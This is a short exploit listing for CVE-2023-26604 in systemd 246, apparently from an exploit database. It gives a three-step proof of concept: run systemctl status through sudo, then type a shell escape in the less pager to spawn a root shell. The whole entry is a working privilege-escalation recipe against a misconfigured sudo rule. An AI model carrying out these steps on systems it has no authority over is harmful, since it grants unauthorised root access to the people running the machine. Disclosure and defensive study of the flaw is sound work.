# Exploit Title: systemd 246 - Local Privilege Escalation # Exploit Author: Iyaad Luqman K (init_6) # Application: systemd 246 # Tested on: Ubuntu 22.04 # CVE: CVE-2023-26604 systemd 246 was discovered to contain Privilege Escalation vulnerability, when the `systemctl status` command can be run as root user. This vulnerability allows a local attacker to gain root privileges. ## Proof Of Concept: 1. Run the systemctl command which can be run as root user. sudo /usr/bin/systemctl status any_service 2. The ouput is opened in a pager (less) which allows us to execute arbitrary commands. 3. Type in `!/bin/sh` in the pager to spawn a shell as root user.